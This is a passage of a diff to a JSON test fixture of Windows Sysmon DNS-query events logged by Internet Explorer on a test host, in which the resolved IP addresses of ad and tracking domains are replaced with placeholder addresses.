ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -6618,7 +6618,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:8.41.222.152;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6636,7 +6636,7 @@ "ProcessId": "2736", "QueryName": "sync.1rx.io", "QueryStatus": "0", - "QueryResults": "::ffff:8.41.222.152;" + "QueryResults": "::ffff:89.160.20.156;" }, "process": { "pid": 2828, @@ -6660,7 +6660,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -6681,7 +6681,7 @@ "ProcessId": "2736", "QueryName": "sync.teads.tv", "QueryStatus": "0", - "QueryResults": "type: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;", + "QueryResults": "type: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.956", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -6719,7 +6719,7 @@ "ProcessId": "2736", "QueryName": "s.thebrighttag.com", "QueryStatus": "0", - "QueryResults": "type: 5 td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -6729,7 +6729,7 @@ "version": 5 }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -6763,7 +6763,7 @@ "event_data": { "QueryName": "t.a3cloud.net", "QueryStatus": "0", - "QueryResults": "type: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;", + "QueryResults": "type: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.050", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6774,7 +6774,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6789,7 +6789,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "level": "information", @@ -6802,7 +6802,7 @@ "ProcessId": "2736", "QueryName": "tps618.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -6837,7 +6837,7 @@ "ProcessId": "2736", "QueryName": "dpm.demdex.net", "QueryStatus": "0", - "QueryResults": "type: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;", + "QueryResults": "type: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.090" }, @@ -6855,7 +6855,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6867,7 +6867,7 @@ { "@timestamp": "2021-05-05T15:30:51.710Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 